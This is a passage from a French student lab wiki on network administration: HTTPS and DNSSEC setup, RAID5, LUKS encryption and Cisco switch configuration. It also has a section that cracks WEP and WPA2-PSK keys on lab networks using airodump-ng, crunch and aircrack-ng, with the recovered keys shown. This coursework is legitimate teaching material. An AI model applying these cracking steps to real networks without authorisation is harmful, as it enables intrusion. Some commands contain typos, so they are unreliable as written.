      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
==== Génération de paires de clefs KSK et ZSK ====&lt;br /&gt;
&lt;br /&gt;
Tout comme pour le certification HTTPS,il faut générer deux paires de clefs pour notre DNSSEC. On peut le faire avec la méthode RSAHA1 suivante :&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
  dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE ima2a5-rex4ever.site&lt;br /&gt;
On obtient alors deux paires de clefs que l'on renomme et que l'on place dans un dossier (que l'on créé evidemment) à l'emplacement '''/etc/bind/ima2a5-rex4ever.site.dnssec'''&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/db.ima2a5-rex4ever.site ====&lt;br /&gt;
Pour une raison que j'ignore, les commandes liées au DNS ont du mal avec les fichiers en db.quelquechose, on renomme donc '''db.ima2a5-rex4ever.site''' en '''ima2a5-rex4ever.site'''&lt;br /&gt;
Puis on ouvre ce fichier fraichement renommé et on ajoute les lignes de la manière suivante :&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL	604800&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk.key'''&lt;br /&gt;
  '''$include /etc/bind/ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk.key'''&lt;br /&gt;
  @	IN	SOA	dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (&lt;br /&gt;
  			29112025	; Serial&lt;br /&gt;
  			 604800		; Refresh&lt;br /&gt;
    			  86400		; Retry&lt;br /&gt;
  			2419200		; Expire&lt;br /&gt;
  			 604800 )	; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
  @  	IN	NS	dns.ima2a5-rex4ever.site.&lt;br /&gt;
  @       IN      NS      ns6.gandi.net.&lt;br /&gt;
  dns	IN	A	193.48.57.163&lt;br /&gt;
  www     IN      A       193.48.57.163&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant faire signer le document grâce à la commande suivante (on créé ainsi le document '''ima2a5-rex4ever.site.signed'''):&lt;br /&gt;
   dnssec-signzone -o ima2a5-rex4ever.site -k ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-ksk ima2a5-rex4ever.site ima2a5-rex4ever.site.dnssec/ima2a5-rex4ever.site-zsk&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.local ====&lt;br /&gt;
Maintenant que le document est signé, il faut dire à Bind de pointer sur celui-ci plutot que sur db....&lt;br /&gt;
Pour ce faire il faut modifier named.conf.local de cette manière :&lt;br /&gt;
&lt;br /&gt;
//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
	type master;&lt;br /&gt;
	file &amp;quot;/etc/bind/ima2a5-rex4ever.site.signed&amp;quot;;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
==== Modification de /etc/bind/named.conf.options ====&lt;br /&gt;
De même que pour le DNS, il faut modifier de la manière suivante pour le DNSSEC :&lt;br /&gt;
   '''dnssec-validation auto;'''&lt;br /&gt;
   '''dnssec-enable yes;'''&lt;br /&gt;
   '''dnssec-lookaside auto;'''&lt;br /&gt;
        auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
    };&lt;br /&gt;
    &lt;br /&gt;
    acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
        217.70.177.40/32; // adresse IP du dns6.gandi.net&lt;br /&gt;
    };&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a relancer , et on peut voir le résultat grâce à [https://dnsviz.net DNSVIZ]&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Diverses commandes ==&lt;br /&gt;
=== Creation du Raid5 avec mdadm ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. &lt;br /&gt;
La manipulation des disques dur restera toujours une opération délicate demandant un maximum d'attention et ne devant pas se faire à la va-vite. Rien de mieux qu'un bon dimanche pluvieux pour s'aventurer dans ces contrées. Ne jamais oublier que les erreurs de manipulation sur les disques sont souvent irréversibles. Vous l'aurez compris, je vous dis tout ça afin de vous désigner comme seul responsable en cas de problèmes qui pourraient survenir sur votre matériel.&lt;br /&gt;
&lt;br /&gt;
Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
On nous propose de réaliser le raid5 logiciel avec l'utilitaire mdadm ([https://doc.ubuntu-fr.org/raid_logiciel mdadm])&lt;br /&gt;
Assemblons maintenant nos 3 disques en un RAID5 via la commande : &lt;br /&gt;
   mdadm --create /dev/md0 --level=5  --raid-devices=3 /dev/xvdb3 /dev/xvdb4 /dev/xvdb5&lt;br /&gt;
'''Note:''' Ne pas essayer de renommer md0&lt;br /&gt;
Pour automatiser le raid5 à chaque démarrage: &lt;br /&gt;
   mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
Puis le formatage du volume RAID nouvellement créé:&lt;br /&gt;
   mkfs.ext4 /dev/md0&lt;br /&gt;
Déclarez ce volume dans `fstab` pour que le système le monte au démarrage (le système de fichier, pas le volume en lui même). Pour ce faire Editez le fichier /etc/fstab et ajoutez à sa fin la ligne :&lt;br /&gt;
   /dev/md0 	/media/raid	ext4	defaults 	0	1&lt;br /&gt;
Puis créer le fichier /media/raid qui est le fichier sur lequel le raid est monté : &lt;br /&gt;
   mkdir /media/raid&lt;br /&gt;
En retirant un disque (mise en commentaire /etc/fstab), le disque md0 est toujours actif et utilisable.&lt;br /&gt;
&lt;br /&gt;
=== Cryptage de données ===&lt;br /&gt;
Le cryptage des données s'effectue grâce à l'utilitaire [https://doc.ubuntu-fr.org/cryptsetup cryptsetup]. Pour se faire, on commence par chercher le nom de la clef USB cible dans le gestionnaire :&lt;br /&gt;
      lsblk&lt;br /&gt;
Dans notre cas,le périphérique cible est nommé '''sdb1'''&lt;br /&gt;
On va acceder aux partitions via :&lt;br /&gt;
      fdisk /dev/sdb1&lt;br /&gt;
Le menu suivant apparait alors :&lt;br /&gt;
   Welcome to fdisk (util-linux 2.25.2).&lt;br /&gt;
   Changes will remain in memory only, until you decide to write them.&lt;br /&gt;
   Be careful before using the write command.&lt;br /&gt;
   Command (m for help):&lt;br /&gt;
On va d'abord nettoyer la clef avant d'y crypter nos données, pour cela on entre le choix 'd' et on supprime les partitions existantes.&lt;br /&gt;
&lt;br /&gt;
Puis pour créer une nouvelle partition on entre le choix 'n' puis 'p' qui correspond à :&lt;br /&gt;
'''n''' nouvelle partition&lt;br /&gt;
'''p''' partition primaire&lt;br /&gt;
&lt;br /&gt;
Command (m for help): n&lt;br /&gt;
Partition type&lt;br /&gt;
   p   primary (0 primary, 0 extended, 4 free)&lt;br /&gt;
   e   extended (container for logical partitions)&lt;br /&gt;
Select (default p):&lt;br /&gt;
&lt;br /&gt;
Using default response p.&lt;br /&gt;
Partition number (1-4, default 1):&lt;br /&gt;
First sector (2048-1953525167, default 2048):&lt;br /&gt;
Last sector, +sectors or +size{K,M,G,T,P} (2048-1953525167, default 1953525167):&lt;br /&gt;
Created a new partition 1 of type 'Linux' and of size xxxx.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis on sauvegarde : &lt;br /&gt;
&lt;br /&gt;
Command (m for help): w&lt;br /&gt;
The partition table has been altered.&lt;br /&gt;
Calling ioctl() to re-read partition table.&lt;br /&gt;
Syncing disks.&lt;br /&gt;
&lt;br /&gt;
La clef est prête, on peut desormais crypter avec l'utilitaire cyptsetup &lt;br /&gt;
    cryptsetup luksFormat -c aes -h sha256 /dev/sdb1&lt;br /&gt;
    cryptsetup open --type luks /dev/sdb1 clef_ima2a_G5&lt;br /&gt;
    mkfs.ext4 /dev/mapper/clef_ima2a_G5&lt;br /&gt;
    mount -t ext4 /dev/mapper/clef_ima2a_G5 /mnt/clef&lt;br /&gt;
&lt;br /&gt;
=== Réseau WPA2-EAK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur ====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E306 !! E304&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/1 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 1/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/3 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 2/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 5/1(E306) &amp;amp; Ge 1/1(E304) &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 1/1(E306) &amp;amp; Ge 2/2(E304) &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   ip routing&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.254   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.6 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
